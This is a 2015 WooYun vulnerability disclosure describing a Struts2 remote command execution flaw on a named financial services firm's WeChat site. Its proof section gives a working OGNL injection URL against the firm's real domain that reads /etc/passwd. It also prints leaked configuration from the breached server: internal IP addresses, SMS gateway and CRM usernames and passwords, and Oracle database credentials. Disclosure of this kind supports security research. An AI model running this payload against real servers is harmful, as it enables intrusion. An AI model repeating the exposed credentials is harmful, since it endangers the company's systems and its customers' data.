当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111745

漏洞标题:某金融服务集团命令执行(可渗透内网,利用短信接口发送短信,劫持微信)

相关厂商:利得财富

漏洞作者: 英雄

提交时间:2015-05-04 10:36

修复时间:2015-06-18 10:38

公开时间:2015-06-18 10:38

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某金融服务集团命令执行(可渗透内网,利用短信接口发送短信,劫持微信)

详细说明:

某金融服务集团struts2命令执行(可渗透内网,利用短信接口发送短信,劫持微信)

漏洞证明:

http://wechat.leadbank.com.cn/loginAction.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}


ws_client_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_username=duKAkFMoHco.
ws_client_password=6TjUEhoBSQKehpqH8dpdQA..
#marketing SMS
ws_client_marketing_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_marketing_username=fVe5Ku0KK9I.
ws_client_marketing_password=McefExADbZflnVElaHjwrw..
#crm ws url
crm_ws_url=http\://10.1.1.224\:8080/imart/services/WechatService?wsdl
crm_ws_namespace=http\://wechat.webservice.crm.leadbank.com.cn
crm_ws_username=ld_wechat
crm_ws_password=Ld_WeChAt


#local jdbc 
#########################################################################
#------------oracle--------------------------
jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
#for test surroundings LD_WECHART/LD_WECHART
#jdbc.url=jdbc:oracle:thin:@10.1.1.249:1521:ORCL
#jdbc.username=H3hRomSK8bR_zMG_VVhY7Q..
#jdbc.password=H3hRomSK8bR_zMG_VVhY7Q..
#for official surroundings LD_WECHAT/LD_WECHAT0923
jdbc.url=jdbc:oracle:thin:@10.1.1.97:1521:ORCL
jdbc.username=H3hRomSK8bSc3B93RFMddw..
#jdbc.password=H3hRomSK8bT0W4spzVOUfw..
jdbc.password=v__vHAmJze07AwHSXpV5EA..

修复方案:

工程狮会!

版权声明:转载请注明来源 英雄@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)